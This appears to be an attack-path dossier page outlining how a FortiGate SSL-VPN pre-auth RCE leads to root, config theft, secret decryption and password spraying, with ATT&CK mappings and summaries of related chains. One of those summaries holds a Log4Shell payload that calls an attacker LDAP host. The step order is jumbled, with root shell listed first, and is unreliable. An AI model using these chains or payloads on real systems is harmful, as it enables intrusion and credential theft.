FortiGate SSL-VPN pre-auth RCE → config theft
Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets.
§ Context
Assumed environment: target operates FortiGate firewalls with SSL-VPN exposed to the internet and unpatched for a recent CVE (CVE-2024-21762, CVE-2023-27997 class).
§ Steps
- 01Root shell on the applianceExecutionT1059— Command and Scripting Interpreter
- 02Spray harvested creds into ADCredential AccessT1110.003— Password Spraying
- 03Decrypt RADIUS shared secret / LDAP bind pwCredential AccessT1552— Unsecured Credentials
- 04Identify FortiGate SSL-VPNReconnaissanceW-RECON-FINGERPRINT— Tech Stack Fingerprinting
- 05Trigger pre-auth heap overflowInitial AccessVPN-FORTINET-RCE— FortiGate / FortiOS RCE
- 06show full-configuration / extract secretsCollectionVPN-CONFIG-EXFIL— VPN Configuration Exfil
§ References
- T1059Command and Scripting Interpreter
- T1110.003Password Spraying
- T1552Unsecured Credentials
§ Frequently asked
- What is the "FortiGate SSL-VPN pre-auth RCE → config theft" attack path?
- Pre-auth heap overflow / format-string against FortiGate sslvpnd grants root on the appliance. Pull the running config, decrypt stored RADIUS / LDAP / VPN-user secrets. It chains 6 steps drawn from real-world offensive-security techniques.
- What starting position does this attack require?
- The first step is Root shell on the appliance (T1059) — a execution primitive. Assumed environment: target operates FortiGate firewalls with SSL-VPN exposed to the internet and unpatched for a recent CVE (CVE-2024-21762, CVE-2023-27997 class).
- What is the final impact of this kill-chain?
- The final step lands on show full-configuration / extract secrets (VPN-CONFIG-EXFIL), which falls under Collection. From here, an operator typically pivots into post-exploitation or maintains persistence.
- How can defenders detect or prevent this attack?
- Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.
§ Related dossiers
- Shared techniques3
Spring4Shell (CVE-2022-22965) → JSP webshell on Tomcat
Send a crafted POST that uses Spring's data-binding to mutate Tomcat's logging configuration — turn its access log into a JSP file written under webapps/, then request it.
- Shared techniques3
F5 BIG-IP iControl auth bypass (CVE-2022-1388) → root on LB
Connection-header smuggle bypasses iControl REST auth, command-injection RCE as root. Load balancers see all traffic — recover TLS keys, session cookies, internal SSO config.
- Shared techniques3
Apache Struts S2-045 (CVE-2017-5638) → Equifax-style breach
Crafted Content-Type header is parsed as OGNL — execute commands as the app user. The 2017 Equifax breach origin: unpatched Struts endpoint exposed to the internet.
- Shared techniques2
SNMPv2c write-community → router config exfil → cred sprays
Find a router with 'private' RW community. Trigger SNMP-to-TFTP config download to attacker host. The config has RADIUS shared secret, AAA server IP, ISAKMP PSKs, and SSH user-pubkeys — spray harvested creds.
- Shared techniques2
Log4Shell (CVE-2021-44228) → RCE → lateral
Send `${jndi:ldap://attacker/x}` in any logged field (User-Agent / X-Forwarded-For). Vulnerable log4j 2.x resolves the JNDI URL, fetches a Java class from attacker LDAP, runs it as the app user.
- Shared techniques2
Ivanti Pulse Connect Secure → pre-auth RCE → corporate VPN takeover
Two-stage chain (auth bypass + command injection) lands root on the Pulse appliance. Exfil VPN configs, pivot through the tunnel into the corporate network.